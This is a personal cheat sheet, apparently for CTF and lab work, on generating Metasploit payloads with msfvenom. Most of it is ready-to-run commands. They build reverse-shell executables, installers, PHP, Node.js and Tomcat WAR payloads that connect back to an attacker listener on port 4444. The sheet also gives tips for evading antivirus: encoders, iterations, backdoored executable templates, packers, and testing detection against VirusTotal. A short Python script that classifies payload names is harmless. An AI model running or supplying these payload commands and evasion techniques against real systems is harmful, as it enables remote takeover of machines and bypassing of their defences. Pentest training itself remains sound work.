🐍 msfvenom 🐍


msfvenom is the payload generator of the Metasploit Framework, typically used to produce reverse-shell payloads. Payloads can be tailored to:

  • 🎠 the program executing the payload (PHP, python...)
  • 🏑 the target operating system
  • πŸ›‘οΈ the presence and configuration of a firewall
  • πŸ”«οΈ the presence and configuration of an antivirus
  • ...
$ msfvenom --list payloads
$ msfvenom --list payloads | grep meterpreter

msfvenom is often paired with msfconsole, which catches the connection coming back and pops a Meterpreter shell (see Metasploit framework; in short, an upgraded shell).

Metasploit distinguishes staged payloads from inline (single) payloads. A staged payload works in two steps: a small initial payload (the stager) is delivered first, and it then requests the rest of the payload (the stage) over the connection. Staged payloads are mainly used when the size of the payload is restricted.

In Metasploit payload names, the _ between stage and stager becomes a / for staged payloads.

  • php/meterpreter_reverse_tcp: inline/single
  • php/meterpreter/reverse_tcp: staged
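As an added example (not part of these notes), a small Python script that parses the table printed by `msfvenom --list payloads` and applies the naming rule above to tell staged from inline payloads. The STAGES and ARCHES sets are assumed representative subsets, and the sample table is constructed, not captured output.

```python
import re

# Stage names Metasploit writes as their own path component in staged payload
# names (assumption: a representative subset, not the full list).
STAGES = {"meterpreter", "shell", "vncinject", "dllinject"}
# Architecture components that may sit between platform and payload (subset).
ARCHES = {"x86", "x64", "aarch64", "armle", "mipsle", "mipsbe", "ppc"}

def classify(name):
    """Staged: stage and stager are separate components (x/meterpreter/reverse_tcp).
    Inline/single: they are joined with '_' (x/meterpreter_reverse_tcp)."""
    parts = name.split("/")
    arch = parts[1] if len(parts) > 2 and parts[1] in ARCHES else None
    staged = len(parts) >= 3 and parts[-2] in STAGES
    return {"name": name, "platform": parts[0], "arch": arch,
            "kind": "staged" if staged else "inline",
            "stage": parts[-2] if staged else None, "stager": parts[-1]}

def parse_payload_list(text):
    """Rows of `msfvenom --list payloads`: indented name with '/', then description."""
    rows = []
    for line in text.splitlines():
        m = re.match(r"^\s+(\S+/\S+)\s+(.*)$", line)
        if m:
            rows.append((m.group(1), m.group(2).strip()))
    return rows

# Constructed sample modelled on the real table layout (not captured output).
SAMPLE = """Framework Payloads (6 total) [--payload <value>]
    Name                                   Description
    ----                                   -----------
    cmd/unix/reverse_netcat                Interactive shell via netcat
    linux/x64/shell_reverse_tcp            Connect back and spawn a shell
    php/meterpreter/reverse_tcp            Reverse PHP connect back stager
    php/meterpreter_reverse_tcp            Meterpreter server (PHP), single
    windows/x64/meterpreter/reverse_https  Reflective DLL injection stager
    java/jsp_shell_reverse_tcp             Connect back and spawn a shell
"""

def summarize(text=SAMPLE):
    """Group payload names by kind so staged and inline can be compared."""
    out = {"staged": [], "inline": []}
    for name, _desc in parse_payload_list(text):
        out[classify(name)["kind"]].append(name)
    return out

if __name__ == "__main__":
    for name, _ in parse_payload_list(SAMPLE):
        info = classify(name)
        print(info["kind"], info["platform"], info["arch"] or "-", name)
```

Feed it the real output of `msfvenom --list payloads` to see which names in a given platform family are staged and which are single.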

🐸 Common options 🐸

-p to define the payload to use.

$ msfvenom -p cmd/unix/reverse_netcat [...]

LHOST/LPORT to define where the target will connect back.

$ msfvenom [...] LHOST=tun0 LPORT=4444

-f to define the format of the output. For instance, raw code.

$ msfvenom [...] -f raw
$ msfvenom [...] R # same as -f raw

-e to define the encoder. It is mainly used to get past a firewall or to reduce the size of the payload.

$ msfvenom [...] -e php/base64

📌 Some payloads 📌

All examples make the target connect back to the tun0 IP on port 4444.

  • Linux (.elf / ...)
# execute /bin/bash -p
$ msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o shell.elf
# Generate a .elf opening a reverse shell (TCP)
$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=tun0 LPORT=4444 -f elf -o shell.elf
# Output a command (RAW) opening a reverse shell with netcat
$ msfvenom -p cmd/unix/reverse_netcat LHOST=tun0 LPORT=4444 -f raw
  • Windows (.exe / .msi / ...)
# Generate a .exe opening a reverse shell (TCP)
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=tun0 LPORT=4444 -f exe -o shell.exe
# Generate a malicious installer (msi)
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=tun0 LPORT=4444 -f msi -o shell.msi
  • Node.js
# Generate a .js opening a reverse shell (TCP)
$ msfvenom -p nodejs/shell_reverse_tcp LHOST=tun0 LPORT=4444 -o shell.js
  • PHP
# very unstable shell, not recommended
$ msfvenom -p php/reverse_php LHOST=tun0 LPORT=4444 -o revshell.php
# meterpreter
$ msfvenom -p php/meterpreter/reverse_tcp LHOST=tun0 LPORT=4444 -o revshell.php
  • Tomcat
# works with Tomcat 7.8
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=4444 -f war -o revshell.war

👻 To-do 👻

Stuff that I found but have never read or used yet.

Payload encoding: make the payload compatible with different architectures and help with antivirus evasion.

  • Shikata Ga Nai (SGN): good but still detected by modern antivirus. -e x86/shikata_ga_nai
  • Use iterations to make it harder to detect: -i 10
  • Password-protected archives are an additional antivirus evasion technique
  • backdoored executable: use executable templates to hide the code
  • Packers are also an alternative: polypack

Other options:

  • -a x86: explicit architecture
  • --platform windows: explicit platform
  • -k: with a backdoored executable, keep the original executable running as it did before. If it is started from a terminal, a new terminal window will (still) pop up.
  • -x xxx.exe: the executable to use as a template
  • -o xxx.exe: the output file

Test on Virus Total: msf-virustotal -k <API key> -f xxx.exe